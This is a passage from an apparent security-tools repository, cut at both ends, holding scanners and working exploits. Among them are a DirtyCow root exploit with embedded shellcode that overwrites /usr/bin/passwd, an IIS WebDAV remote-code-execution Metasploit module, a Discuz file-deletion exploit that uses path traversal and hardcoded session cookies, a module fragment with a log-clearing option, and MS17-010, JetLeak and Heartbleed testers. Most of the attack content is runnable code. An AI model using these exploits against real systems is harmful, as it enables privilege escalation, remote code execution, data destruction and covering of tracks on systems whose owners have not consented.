"\x37\x2c\x35\x38\x2c\x35\x39\x2c\x36\x30\x3a\x3a\x31" 215 | # 216 | # u2 = "\xa4\x00\x00\x00\x00\x00\x00\x00\x1a\x00\x00\x00\x00\x00\x00\x00" + 217 | # "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00" 218 | # u3 = "\xa4\x00\x00\x00\x00\x00\x00\x00\x08\x00\x00\x00\x00\x00\x00\x00" + 219 | # "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00" 220 | # u4 = "\xa6\x00\x00\x00\x00\x00\x00\x00\x01\x00\x00\x00\x00\x00\x00\x00" + 221 | # "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00" 222 | # u5 = "\xa6\x00\x00\x00#{userstring.length.chr}\x00\x00\x00\x06\x00\x00\x00\x00\x00\x00\x00" + 223 | # "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00" + 224 | # userstring 225 | # sock.put(u1) 226 | # sock.get(1024) 227 | # sock.put(u1) 228 | # sock.get(1024) 229 | # sock.put(u2) 230 | # sock.get(1024) 231 | # sock.put(u3) 232 | # sock.get(1024) 233 | # sock.put(u2) 234 | # sock.get(1024) 235 | # sock.put(u3) 236 | # sock.get(1024) 237 | # sock.put(u4) 238 | # sock.get(1024) 239 | # sock.put(groups) 240 | # sock.get(1024) 241 | # sock.put(users) 242 | # sock.get(1024) 243 | # sock.put(u5) 244 | # sock.get(1024) 245 | # sock.put(u2) 246 | # sock.get(1024) 247 | # sock.put(u3) 248 | # sock.get(1024) 249 | # sock.put(u4) 250 | # sock.put(1024) 251 | # sock.put(groups) 252 | # sock.get(1024) 253 | # sock.put(users) 254 | # sock.put(1024) 255 | # print_good("ADDED USER!: user #{datastore['USERNAME']}'s password is #{datastore['PASSWORD']}") 256 | # 257 | # else 258 | end 259 | 260 | 261 | if (datastore['CLEAR_LOGS']) 262 | sock.put(clear_logs) 263 | sock.put(clear_logs2) 264 | print_good("LOGS CLEARED! @ #{rhost}:#{rport}") 265 | end 266 | disconnect() 267 | end 268 | end 269 | 270 | end -------------------------------------------------------------------------------- /IIS_short_name_scanner.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/env python 2 | #encoding:utf-8 3 | #IIS short_name scanner 4 | 5 | 6 | import sys 7 | import httplib 8 | import urlparse 9 | import threading 10 | import Queue 11 | import time 12 | 13 | 14 | class Scanner(): 15 | def __init__(self, target): 16 | self.target = target.lower() 17 | if not self.target.startswith('http'): 18 | self.target = 'http://%s' % self.target 19 | self.scheme, self.netloc, self.path, params, query, fragment = \ 20 | urlparse.urlparse(target) 21 | if self.path[-1:] != '/': # ends with slash 22 | self.path += '/' 23 | self.alphanum = 'abcdefghijklmnopqrstuvwxyz0123456789_-' 24 | self.files = [] 25 | self.dirs = [] 26 | self.queue = Queue.Queue() 27 | self.lock = threading.Lock() 28 | self.threads = [] 29 | self.request_method = '' 30 | self.msg_queue = Queue.Queue() 31 | self.STOP_ME = False 32 | threading.Thread(target=self._print).start() 33 | 34 | def _conn(self): 35 | try: 36 | if self.scheme == 'https': 37 | conn = httplib.HTTPSConnection(self.netloc) 38 | else: 39 | conn = httplib.HTTPConnection(self.netloc) 40 | return conn 41 | except Exception, e: 42 | print '[_conn.Exception]', e 43 | return None 44 | 45 | def _get_status(self, path): 46 | try: 47 | conn = self._conn() 48 | conn.request(self.request_method, path) 49 | status = conn.getresponse().status 50 | conn.close() 51 | return status 52 | except Exception, e: 53 | raise Exception('[_get_status.Exception] %s' % str(e) ) 54 | 55 | def is_vul(self): 56 | try: 57 | for _method in ['GET', 'OPTIONS']: 58 | self.request_method = _method 59 | status_1 = self._get_status(self.path + '/*~1*/a.aspx') # an existed file/folder 60 | status_2 = self._get_status(self.path + '/l1j1e*~1*/a.aspx') # not existed file/folder 61 | if status_1 == 404 and status_2 != 404: 62 | return True 63 | return False 64 | except Exception, e: 65 | raise Exception('[is_vul.Exception] %s' % str(e) ) 66 | 67 | def run(self): 68 | for c in self.alphanum: 69 | self.queue.put( (self.path + c, '.*') ) # filename, extension 70 | for i in range(20): 71 | t = threading.Thread(target=self._scan_worker) 72 | self.threads.append(t) 73 | t.start() 74 | for t in self.threads: 75 | t.join() 76 | self.STOP_ME = True 77 | 78 | def report(self): 79 | print '-'* 64 80 | for d in self.dirs: 81 | print 'Dir: %s' % d 82 | for f in self.files: 83 | print 'File: %s' % f 84 | print '-'*64 85 | print '%d Directories, %d Files found in total' % (len(self.dirs), len(self.files)) 86 | print 'Note that * is a wildcard, matches any character zero or more times.' 87 | 88 | def _print(self): 89 | while not self.STOP_ME or (not self.msg_queue.empty()): 90 | if self.msg_queue.empty(): 91 | time.sleep(0.05) 92 | else: 93 | print self.msg_queue.get() 94 | 95 | def _scan_worker(self): 96 | while True: 97 | try: 98 | url, ext = self.queue.get(timeout=1.0) 99 | status = self._get_status(url + '*~1' + ext + '/1.aspx') 100 | if status == 404: 101 | self.msg_queue.put('[+] %s~1%s\t[scan in progress]' % (url, ext)) 102 | 103 | if len(url) - len(self.path)< 6: # enum first 6 chars only 104 | for c in self.alphanum: 105 | self.queue.put( (url + c, ext) ) 106 | else: 107 | if ext == '.*': 108 | self.queue.put( (url, '') ) 109 | 110 | if ext == '': 111 | self.dirs.append(url + '~1') 112 | self.msg_queue.put('[+] Directory ' + url + '~1\t[Done]') 113 | 114 | elif len(ext) == 5 or (not ext.endswith('*')): # .asp* 115 | self.files.append(url + '~1' + ext) 116 | self.msg_queue.put('[+] File ' + url + '~1' + ext + '\t[Done]') 117 | 118 | else: 119 | for c in 'abcdefghijklmnopqrstuvwxyz0123456789': 120 | self.queue.put( (url, ext[:-1] + c + '*') ) 121 | if len(ext) < 4: # < len('.as*') 122 | self.queue.put( (url, ext[:-1] + c) ) 123 | 124 | except Queue.Empty,e: 125 | break 126 | except Exception, e: 127 | print '[Exception]', e 128 | 129 | 130 | if __name__ == '__main__': 131 | if len(sys.argv) == 1: 132 | print 'Usage: python IIS_shortname_Scan.py http://www.target.com/' 133 | sys.exit() 134 | 135 | target = sys.argv[1] 136 | s = Scanner(target) 137 | if not s.is_vul(): 138 | s.STOP_ME = True 139 | print 'Server is not vulnerable' 140 | sys.exit(0) 141 | 142 | print 'Server is vulnerable, please wait, scanning...' 143 | s.run() 144 | s.report() 145 | -------------------------------------------------------------------------------- /Jetleak-Testing-Script/README.md: -------------------------------------------------------------------------------- 1 | # Jetleak Testing Script 2 | ### Jetty web server 远程共享缓冲区泄漏 [CVE-2015-2080] 3 | 4 | This tool is intended to provide a quick-and-dirty way for organizations to test whether their Jetty web server versions are vulnerable to JetLeak. Currently, this script does not handle sites with invalid SSL certs. This will be fixed in a future iteration. 5 | 6 | For additional details on the Jetleak vulnerability refer to our blog post: http://blog.gdssecurity.com/labs/2015/2/25/jetleak-vulnerability-remote-leakage-of-shared-buffers-in-je.html 7 | 8 | Sample Usage: python jetleak_tester.py [url] [port] 9 | 10 | Sample Output for a server that is not vulnerable: 11 | 12 | $ python jetleak_tester.py http://[ENTER HOSTNAME] 80 13 | 14 | This version of Jetty is NOT vulnerable to JetLeak. 15 | Sample Output for a server that is vulnerable: 16 | 17 | $ python jetleak_tester.py http://[ENTER HOSTNAME] 80 18 | 19 | This version of Jetty is VULNERABLE to JetLeak! 20 | -------------------------------------------------------------------------------- /Jetleak-Testing-Script/jetleak_exp.py: -------------------------------------------------------------------------------- 1 | import httplib, urllib 2 | conn = httplib.HTTPConnection("127.0.0.1:8080") 3 | headers = {"Referer": chr(0)*44} 4 | conn.request("POST", "/test-spec/test", "", headers) 5 | r1 = conn.getresponse() 6 | print r1.status, r1.reason 7 | -------------------------------------------------------------------------------- /Jetleak-Testing-Script/jetleak_tester.py: -------------------------------------------------------------------------------- 1 | import httplib, urllib, ssl, string, sys, getopt 2 | from urlparse import urlparse 3 | 4 | ''' 5 | Author: Gotham Digital Science 6 | Purpose: This tool is intended to provide a quick-and-dirty way for organizations to test whether 7 | their Jetty web server versions are vulnerable to JetLeak. Currently, this script does 8 | not handle sites with invalid SSL certs. This will be fixed in a future iteration. 9 | ''' 10 | 11 | if len(sys.argv) < 3: 12 | print("Usage: jetleak.py [url] [port]") 13 | sys.exit(1) 14 | 15 | url = urlparse(sys.argv[1]) 16 | if url.scheme == '' and url.netloc == '': 17 | print("Error: Invalid URL Entered.") 18 | sys.exit(1) 19 | 20 | port = sys.argv[2] 21 | 22 | conn = None 23 | 24 | if url.scheme == "https": 25 | conn = httplib.HTTPSConnection(url.netloc + ":" + port) 26 | elif url.scheme == "http": 27 | conn = httplib.HTTPConnection(url.netloc + ":" + port) 28 | else: 29 | print("Error: Only 'http' or 'https' URL Schemes Supported") 30 | sys.exit(1) 31 | 32 | x = "\x00" 33 | headers = {"Referer": x} 34 | conn.request("POST", "/", "", headers) 35 | r1 = conn.getresponse() 36 | 37 | if (r1.status == 400 and ("Illegal character 0x0 in state" in r1.reason)): 38 | print("\r\nThis version of Jetty is VULNERABLE to JetLeak!") 39 | else: 40 | print("\r\nThis version of Jetty is NOT vulnerable to JetLeak.") 41 | -------------------------------------------------------------------------------- /MS17-010/ms17-010.php: -------------------------------------------------------------------------------- 1 | [+] Vulnerability!'; 11 | }else{ 12 | echo '[-] No Vulnerability!'; 13 | } 14 | echo '
[+] OS: '.smbos($host,445)."
"; 15 | } 16 | function ms17010($host,$port){ 17 | $tcp='tcp://'.$host.':'.$port; 18 | $sock=stream_socket_client($tcp,$errno, $errstr, 3,STREAM_CLIENT_CONNECT); 19 | if ($sock){ 20 | $data1=pack('H*','00000054ff534d42720000000018012800000000000000000000000000002f4b0000c55e003100024c414e4d414e312e3000024c4d312e325830303200024e54204c414e4d414e20312e3000024e54204c4d20302e313200'); 21 | fwrite($sock,$data1); 22 | fread($sock, 1024); 23 | $data2=pack('H*','00000063ff534d42730000000018012000000000000000000000000000002f4b0000c55e0dff000000dfff02000100000000000000000000000000400000002600002e0057696e646f7773203230303020323139350057696e646f7773203230303020352e3000'); 24 | fwrite($sock,$data2); 25 | $data2_data=fread($sock, 1024); 26 | $user_id=substr(bin2hex($data2_data),64,4); 27 | $data3=pack('H*','000000'.dechex(58+strlen($host)).'ff534d42750000000018012000000000000000000000000000002f4b'.$user_id.'c55e04ff000000000001001a00005c5c'.bin2hex($host).'5c49504324003f3f3f3f3f00'); 28 | fwrite($sock,$data3); 29 | $data3_data=fread($sock, 1024); 30 | $allid=substr(bin2hex($data3_data),28*2,16); 31 | $data4=pack('H*','0000004aff534d422500000000180128000000000000000000000000'.$allid.'1000000000ffffffff0000000000000000000000004a0000004a0002002300000007005c504950455c00'); 32 | fwrite($sock,$data4); 33 | $data4_data=fread($sock, 1024); 34 | if(substr(bin2hex($data4_data),18,8) == '050200c0'){ 35 | return true; 36 | }else{ 37 | return false; 38 | } 39 | } 40 | } 41 | function smbos($host,$port){ 42 | $tcp='tcp://'.$host.':'.$port; 43 | $sock=stream_socket_client($tcp,$errno, $errstr, 3,STREAM_CLIENT_CONNECT); 44 | if ($sock){ 45 | $payload1=pack('H*','00000085ff534d4272000000001853c80000000000000000000000000000fffe00000000006200025043204e4554574f524b2050524f4752414d20312e3000024c414e4d414e312e30000257696e646f777320666f7220576f726b67726f75707320332e316100024c4d312e325830303200024c414e4d414e322e3100024e54204c4d20302e313200'); 46 | $payload2=pack('H*','0000010aff534d4273000000001807c80000000000000000000000000000fffe000040000cff000a01044132000000000000004a0000000000d40000a0cf00604806062b0601050502a03e303ca00e300c060a2b06010401823702020aa22a04284e544c4d5353500001000000078208a2000000000000000000000000000000000502ce0e0000000f00570069006e0064006f0077007300200053006500720076006500720020003200300030003300200033003700390030002000530065007200760069006300650020005000610063006b002000320000000000570069006e0064006f0077007300200053006500720076006500720020003200300030003300200035002e00320000000000'); 47 | fwrite($sock,$payload1); 48 | $out1=fread($sock, 1024); 49 | fwrite($sock,$payload2); 50 | $out2=fread($sock, 1024); 51 | $blob_len_arr=unpack('s',substr($out2,36+7,2)); 52 | $osarr=explode(chr(0),iconv('UTF-16LE','UTF-8',substr($out2,36+11+$blob_len_arr[1]))); 53 | return $osarr[0].'|'.$osarr[1]; 54 | } 55 | } 56 | ?> 57 | -------------------------------------------------------------------------------- /MS17-010/ms17-010.py: -------------------------------------------------------------------------------- 1 | # coding=utf-8 2 | import socket 3 | import binascii 4 | 5 | 6 | def get_plugin_info(): 7 | plugin_info = { 8 | "name": "SMB远程溢出", 9 | "info": "MS17-010(NSA Eternalblue SMB),攻击者可通过此漏洞执行任意代码,进而导致服务器被入侵控制。", 10 | "level": "紧急", 11 | "type": "远程溢出", 12 | "author": "wolf@YSRC", 13 | "url": "http://bobao.360.cn/learning/detail/3738.html", 14 | "keyword": "server:smb", 15 | "source": 1 16 | } 17 | return plugin_info 18 | 19 | def check(ip, port, timeout): 20 | negotiate_protocol_request = binascii.unhexlify( 21 | "00000054ff534d42720000000018012800000000000000000000000000002f4b0000c55e003100024c414e4d414e312e3000024c4d312e325830303200024e54204c414e4d414e20312e3000024e54204c4d20302e313200") 22 | session_setup_request = binascii.unhexlify( 23 | "00000063ff534d42730000000018012000000000000000000000000000002f4b0000c55e0dff000000dfff02000100000000000000000000000000400000002600002e0057696e646f7773203230303020323139350057696e646f7773203230303020352e3000") 24 | try: 25 | s = socket.socket(socket.AF_INET, socket.SOCK_STREAM) 26 | s.settimeout(timeout) 27 | s.connect((ip, port)) 28 | s.send(negotiate_protocol_request) 29 | s.recv(1024) 30 | s.send(session_setup_request) 31 | data = s.recv(1024) 32 | user_id = data[32:34] 33 | tree_connect_andx_request = "000000%xff534d42750000000018012000000000000000000000000000002f4b%sc55e04ff000000000001001a00005c5c%s5c49504324003f3f3f3f3f00" % ((58 + len(ip)), user_id.encode('hex'), ip.encode('hex')) 34 | s.send(binascii.unhexlify(tree_connect_andx_request)) 35 | data = s.recv(1024) 36 | allid = data[28:36] 37 | payload = "0000004aff534d422500000000180128000000000000000000000000%s1000000000ffffffff0000000000000000000000004a0000004a0002002300000007005c504950455c00" % allid.encode('hex') 38 | s.send(binascii.unhexlify(payload)) 39 | data = s.recv(1024) 40 | s.close() 41 | if "\x05\x02\x00\xc0" in data: 42 | return u"存在SMB远程溢出漏洞" 43 | s.close() 44 | except: 45 | pass 46 | -------------------------------------------------------------------------------- /README.md: -------------------------------------------------------------------------------- 1 | ## Some Tools and Env. 2 | -------------------------------------------------------------------------------- /c0w.c: -------------------------------------------------------------------------------- 1 | /* 2 | * A PTRACE_POKEDATA variant of CVE-2016-5195 3 | * should work on RHEL 5 & 6 4 | * 5 | * (un)comment correct payload (x86 or x64)! 6 | * $ gcc -pthread c0w.c -o c0w 7 | * $ ./c0w 8 | * DirtyCow root privilege escalation 9 | * Backing up /usr/bin/passwd.. to /tmp/bak 10 | * mmap fa65a000 11 | * madvise 0 12 | * ptrace 0 13 | * $ /usr/bin/passwd 14 | * [root@server foo]# whoami 15 | * root 16 | * [root@server foo]# id 17 | * uid=0(root) gid=501(foo) groups=501(foo) 18 | * @KrE80r 19 | */ 20 | #include 21 | #include 22 | #include 23 | #include 24 | #include 25 | #include 26 | #include 27 | #include 28 | #include 29 | #include 30 | #include 31 | 32 | int f; 33 | void *map; 34 | pid_t pid; 35 | pthread_t pth; 36 | struct stat st; 37 | 38 | // change if no permissions to read 39 | char suid_binary[] = "/usr/bin/passwd"; 40 | 41 | /* 42 | * $ msfvenom -p linux/x64/exec CMD=/bin/bash PrependSetuid=True -f elf | xxd -i 43 | */ 44 | unsigned char shell_code[] = { 45 | 0x7f, 0x45, 0x4c, 0x46, 0x02, 0x01, 0x01, 0x00, 0x00, 0x00, 0x00, 0x00, 46 | 0x00, 0x00, 0x00, 0x00, 0x02, 0x00, 0x3e, 0x00, 0x01, 0x00, 0x00, 0x00, 47 | 0x78, 0x00, 0x40, 0x00, 0x00, 0x00, 0x00, 0x00, 0x40, 0x00, 0x00, 0x00, 48 | 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 49 | 0x00, 0x00, 0x00, 0x00, 0x40, 0x00, 0x38, 0x00, 0x01, 0x00, 0x00, 0x00, 50 | 0x00, 0x00, 0x00, 0x00, 0x01, 0x00, 0x00, 0x00, 0x07, 0x00, 0x00, 0x00, 51 | 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x40, 0x00, 52 | 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x40, 0x00, 0x00, 0x00, 0x00, 0x00, 53 | 0xb1, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0xea, 0x00, 0x00, 0x00, 54 | 0x00, 0x00, 0x00, 0x00, 0x00, 0x10, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 55 | 0x48, 0x31, 0xff, 0x6a, 0x69, 0x58, 0x0f, 0x05, 0x6a, 0x3b, 0x58, 0x99, 56 | 0x48, 0xbb, 0x2f, 0x62, 0x69, 0x6e, 0x2f, 0x73, 0x68, 0x00, 0x53, 0x48, 57 | 0x89, 0xe7, 0x68, 0x2d, 0x63, 0x00, 0x00, 0x48, 0x89, 0xe6, 0x52, 0xe8, 58 | 0x0a, 0x00, 0x00, 0x00, 0x2f, 0x62, 0x69, 0x6e, 0x2f, 0x62, 0x61, 0x73, 59 | 0x68, 0x00, 0x56, 0x57, 0x48, 0x89, 0xe6, 0x0f, 0x05 60 | }; 61 | unsigned int sc_len = 177; 62 | 63 | /* 64 | * $ msfvenom -p linux/x86/exec CMD=/bin/bash PrependSetuid=True -f elf | xxd -i 65 | unsigned char shell_code[] = { 66 | 0x7f, 0x45, 0x4c, 0x46, 0x01, 0x01, 0x01, 0x00, 0x00, 0x00, 0x00, 0x00, 67 | 0x00, 0x00, 0x00, 0x00, 0x02, 0x00, 0x03, 0x00, 0x01, 0x00, 0x00, 0x00, 68 | 0x54, 0x80, 0x04, 0x08, 0x34, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 69 | 0x00, 0x00, 0x00, 0x00, 0x34, 0x00, 0x20, 0x00, 0x01, 0x00, 0x00, 0x00, 70 | 0x00, 0x00, 0x00, 0x00, 0x01, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 71 | 0x00, 0x80, 0x04, 0x08, 0x00, 0x80, 0x04, 0x08, 0x88, 0x00, 0x00, 0x00, 72 | 0xbc, 0x00, 0x00, 0x00, 0x07, 0x00, 0x00, 0x00, 0x00, 0x10, 0x00, 0x00, 73 | 0x31, 0xdb, 0x6a, 0x17, 0x58, 0xcd, 0x80, 0x6a, 0x0b, 0x58, 0x99, 0x52, 74 | 0x66, 0x68, 0x2d, 0x63, 0x89, 0xe7, 0x68, 0x2f, 0x73, 0x68, 0x00, 0x68, 75 | 0x2f, 0x62, 0x69, 0x6e, 0x89, 0xe3, 0x52, 0xe8, 0x0a, 0x00, 0x00, 0x00, 76 | 0x2f, 0x62, 0x69, 0x6e, 0x2f, 0x62, 0x61, 0x73, 0x68, 0x00, 0x57, 0x53, 77 | 0x89, 0xe1, 0xcd, 0x80 78 | }; 79 | unsigned int sc_len = 136; 80 | */ 81 | 82 | void *madviseThread(void *arg) { 83 | int i,c=0; 84 | for(i=0;i<200000000;i++) 85 | c+=madvise(map,100,MADV_DONTNEED); 86 | printf("madvise %d\n\n",c); 87 | } 88 | 89 | 90 | int main(int argc,char *argv[]){ 91 | 92 | printf(" \n\ 93 | (___) \n\ 94 | (o o)_____/ \n\ 95 | @@ ` \\ \n\ 96 | \\ ____, /%s \n\ 97 | // // \n\ 98 | ^^ ^^ \n\ 99 | ", suid_binary); 100 | char *backup; 101 | printf("DirtyCow root privilege escalation\n"); 102 | printf("Backing up %s to /tmp/bak\n", suid_binary); 103 | asprintf(&backup, "cp %s /tmp/bak", suid_binary); 104 | system(backup); 105 | 106 | f=open(suid_binary,O_RDONLY); 107 | fstat(f,&st); 108 | map=mmap(NULL,st.st_size+sizeof(long),PROT_READ,MAP_PRIVATE,f,0); 109 | printf("mmap %x\n\n",map); 110 | pid=fork(); 111 | if(pid){ 112 | waitpid(pid,NULL,0); 113 | int u,i,o,c=0,l=sc_len; 114 | for(i=0;i<10000/l;i++) 115 | for(o=0;o 'CVE-2017-7269 Microsoft IIS WebDav ScStoragePathFromUrl Overflow', 12 | 'Description' => %q{ 13 | Buffer overflow in the ScStoragePathFromUrl function in the WebDAV service in Internet Information Services (IIS) 6.0 in Microsoft Windows Server 2003 R2 allows remote attackers to execute arbitrary code via a long header beginning with "If: [ 'Dominic Chell ' ], 17 | 'License' => MSF_LICENSE, 18 | 'References' => 19 | [ 20 | [ 'CVE', 'CVE-2017-7269'], 21 | [ 'BID', '97127'], 22 | [ 'URL', 'https://github.com/edwardz246003/IIS_exploit'], 23 | ], 24 | 'Privileged' => false, 25 | 'Payload' => 26 | { 27 | 'Space' => 2000, 28 | 'BadChars' => "\x00", 29 | 'EncoderType' => Msf::Encoder::Type::AlphanumUnicodeMixed, 30 | 'DisableNops' => 'True', 31 | 'EncoderOptions' => 32 | { 33 | 'BufferRegister' => 'ESI', 34 | } 35 | }, 36 | 'DefaultOptions' => 37 | { 38 | 'EXITFUNC' => 'process', 39 | 'PrependMigrate' => true, 40 | 'PrependMigrateProc' => "calc" 41 | }, 42 | 'Targets' => 43 | [ 44 | [ 45 | 'Microsoft Windows Server 2003 R2', 46 | { 47 | 'Platform' => 'win', 48 | }, 49 | ], 50 | ], 51 | 'Platform' => 'win', 52 | 'DisclosureDate' => 'March 26 2017', 53 | 'DefaultTarget' => 0)) 54 | 55 | register_options( 56 | [ 57 | Opt::RPORT(80) 58 | ], self.class) 59 | end 60 | 61 | def exploit 62 | connect 63 | 64 | buf1 = "If: " 67 | buf1 << " (Not ) \r\n\r\n") 73 | 74 | handler 75 | disconnect 76 | end 77 | 78 | end 79 | -------------------------------------------------------------------------------- /cve-2017-7269/readme.md: -------------------------------------------------------------------------------- 1 | ### cve-2017-7269 IIS WebDAV远程代码执行漏洞 2 | -------------------------------------------------------------------------------- /discuz_file_delete/exp.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/env python 2 | # -*- coding: utf-8 -*- 3 | import requests 4 | import re 5 | import urllib2 6 | 7 | def get_cookie(): 8 | cookies={} 9 | for line in raw_cookies.split(';'): 10 | key,value=line.split('=',1) 11 | cookies[key]=value 12 | return cookies 13 | def get_formhash(url): 14 | cookies=get_cookie() 15 | testurl=url+"/home.php?mod=spacecp" 16 | s=requests.get(testurl,cookies=cookies) 17 | com = re.compile('') 18 | result = com.findall(s.text) 19 | return result[0] 20 | def del_step1(url,filename): 21 | headers={'User-Agent':'Mozilla/5.0 (Windows NT 10.0; WOW64; rv:55.0) Gecko/20100101 Firefox/55.0'} 22 | geturl=url+"/home.php?mod=spacecp&ac=profile&op=base" 23 | formhash=get_formhash(url) 24 | payload ={'birthprovince':filename,"profilesubmit":1,"formhash":formhash} 25 | cookies=get_cookie() 26 | r = requests.post(geturl,data=payload,headers=headers,cookies=cookies) 27 | if r.content.find('parent.show_success')>0: 28 | print 'Step1 success!!!' 29 | def del_step2(url): 30 | geturl=url+"/home.php?mod=spacecp&ac=profile&op=base&deletefile[birthprovince]=aaaaaa" 31 | heads={'User-Agent':'Mozilla/5.0 (Windows NT 10.0; WOW64; rv:55.0) Gecko/20100101 Firefox/55.0'} 32 | formhash=get_formhash(url) 33 | files ={'formhash':(None,formhash),'birthprovince':('1.jpg',open('1.jpg','rb'),'image/jpeg'),'profilesubmit':(None,'1')} 34 | cookies=get_cookie() 35 | r=requests.post(geturl,files=files,headers=heads,cookies=cookies) 36 | if r.text.find('parent.show_success')>0: 37 | print 'Step2 success!!!' 38 | 39 | if __name__ == '__main__': 40 | #需要修改以下三个参数: 41 | #1、设置cookie 42 | raw_cookies="KDLk_2132_saltkey=N8K92IN8; KDLk_2132_lastvisit=1529041942; KDLk_2132_sid=Nk02TO; KDLk_2132_seccode=4.c9962205b642fb914f; KDLk_2132_ulastactivity=d414n%2BRa7lVl%2Fn%2F06lqRciP3sBxmjiYq4BZK9WstbOt0XHe%2BpNPU; KDLk_2132_auth=9df5iTEVucXV60BPWGm2guEhgozOakCOU1ZpISmlzFKPsEYuqdXv%2BCADzXQ6cY%2F6GXRJ1RIpf7PXdKDcKDPZ; KDLk_2132_lastcheckfeed=2%7C1529045562; KDLk_2132_lip=60.12.13.74%2C1529045518; KDLk_2132_nofavfid=1; KDLk_2132_lastact=1529046182%09misc.php%09patch; 8rWP_2132_saltkey=TwcSBIsp; 8rWP_2132_lastvisit=1529044715; 8rWP_2132_sid=CBef9F; 8rWP_2132__refer=%252Fhome.php%253Fmod%253Dspacecp%2526ac%253Dprofile; 8rWP_2132_lastact=1529050441%09misc.php%09seccode; 8rWP_2132_seccode=6.eb6a6cb2aa6d9068f2; zj4O_2132_saltkey=PgV54Iy8; zj4O_2132_lastvisit=1529049430; zj4O_2132_sid=l5GBCN; zj4O_2132_sendmail=1; zj4O_2132_seccode=1.cbaedf401bf4e1a08f; zj4O_2132_ulastactivity=d2a6fgylrUysBI0%2BXJc3lQK%2BxwKHgOjReqeibkUpAOk0LIlMf%2BfR; zj4O_2132_auth=d2ffPCW%2BNiwwFlDDtdNH3VL1T%2FO%2FUDo1sndn9lg0NwiBH0Ko5EmzsAuCokoAfu6v5jAj8soDdq2ee48NSWcS; zj4O_2132_noticeTitle=1; zj4O_2132_lastact=1529053101%09home.php%09spacecp; zj4O_2132_checkpm=1" 43 | #2、设置删除的文件 44 | filename="../../../data/install.lock" 45 | #3、设置url 46 | url="http://127.0.0.1" 47 | del_step1(url,filename) 48 | del_step2(url) 49 | -------------------------------------------------------------------------------- /discuz_file_delete/readme.md: -------------------------------------------------------------------------------- 1 | ### Discuz!X≤3.4 任意文件删除漏洞 2 | -------------------------------------------------------------------------------- /heartbleedtest.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/python 2 | 3 | # Quick and dirty demonstration of CVE-2014-0160 by Jared Stafford (jspenguin@jspenguin.org) 4 | # The author disclaims copyright to this source code. 5 | 6 | import sys 7 | import struct 8 | import socket 9 | import time 10 | import select 11 | import re 12 | from optparse import OptionParser 13 | 14 | options = OptionParser(usage='%prog server [options]', description='Test for SSL heartbeat vulnerability (CVE-2014-0160)') 15 | options.add_option('-p', '--port', type='int', default=443, help='TCP port to test (default: 443)') 16 | 17 | def h2bin(x): 18 | return x.replace(' ', '').replace('\n', '').decode('hex') 19 | 20 | hello = h2bin(''' 21 | 16 03 02 00 dc 01 00 00 d8 03 02 53 22 | 43 5b 90 9d 9b 72 0b bc 0c bc 2b 92 a8 48 97 cf 23 | bd 39 04 cc 16 0a 85 03 90 9f 77 04 33 d4 de 00 24 | 00 66 c0 14 c0 0a c0 22 c0 21 00 39 00 38 00 88 25 | 00 87 c0 0f c0 05 00 35 00 84 c0 12 c0 08 c0 1c 26 | c0 1b 00 16 00 13 c0 0d c0 03 00 0a c0 13 c0 09 27 | c0 1f c0 1e 00 33 00 32 00 9a 00 99 00 45 00 44 28 | c0 0e c0 04 00 2f 00 96 00 41 c0 11 c0 07 c0 0c 29 | c0 02 00 05 00 04 00 15 00 12 00 09 00 14 00 11 30 | 00 08 00 06 00 03 00 ff 01 00 00 49 00 0b 00 04 31 | 03 00 01 02 00 0a 00 34 00 32 00 0e 00 0d 00 19 32 | 00 0b 00 0c 00 18 00 09 00 0a 00 16 00 17 00 08 33 | 00 06 00 07 00 14 00 15 00 04 00 05 00 12 00 13 34 | 00 01 00 02 00 03 00 0f 00 10 00 11 00 23 00 00 35 | 00 0f 00 01 01 36 | ''') 37 | 38 | hb = h2bin(''' 39 | 18 03 02 00 03 40 | 01 40 00 41 | ''') 42 | 43 | def hexdump(s): 44 | for b in xrange(0, len(s), 16): 45 | lin = [c for c in s[b : b + 16]] 46 | hxdat = ' '.join('%02X' % ord(c) for c in lin) 47 | pdat = ''.join((c if 32 <= ord(c) <= 126 else '.' )for c in lin) 48 | print ' %04x: %-48s %s' % (b, hxdat, pdat) 49 | print 50 | 51 | def recvall(s, length, timeout=5): 52 | endtime = time.time() + timeout 53 | rdata = '' 54 | remain = length 55 | while remain > 0: 56 | rtime = endtime - time.time() 57 | if rtime < 0: 58 | return None 59 | r, w, e = select.select([s], [], [], 5) 60 | if s in r: 61 | data = s.recv(remain) 62 | # EOF? 63 | if not data: 64 | return None 65 | rdata += data 66 | remain -= len(data) 67 | return rdata 68 | 69 | 70 | def recvmsg(s): 71 | hdr = recvall(s, 5) 72 | if hdr is None: 73 | print 'Unexpected EOF receiving record header - server closed connection' 74 | return None, None, None 75 | typ, ver, ln = struct.unpack('>BHH', hdr) 76 | pay = recvall(s, ln, 10) 77 | if pay is None: 78 | print 'Unexpected EOF receiving record payload - server closed connection' 79 | return None, None, None 80 | print ' ... received message: type = %d, ver = %04x, length = %d' % (typ, ver, len(pay)) 81 | return typ, ver, pay 82 | 83 | def hit_hb(s): 84 | s.send(hb) 85 | while True: 86 | typ, ver, pay = recvmsg(s) 87 | if typ is None: 88 | print 'No heartbeat response received, server likely not vulnerable' 89 | return False 90 | 91 | if typ == 24: 92 | print 'Received heartbeat response:' 93 | hexdump(pay) 94 | if len(pay) > 3: 95 | print 'WARNING: server returned more data than it should - server is vulnerable!' 96 | else: 97 | print 'Server processed malformed heartbeat, but did not return any extra data.' 98 | return True 99 | 100 | if typ == 21: 101 | print 'Received alert:' 102 | hexdump(pay) 103 | print 'Server returned error, likely not vulnerable' 104 | return False 105 | 106 | def main(): 107 | opts, args = options.parse_args() 108 | if len(args) < 1: 109 | 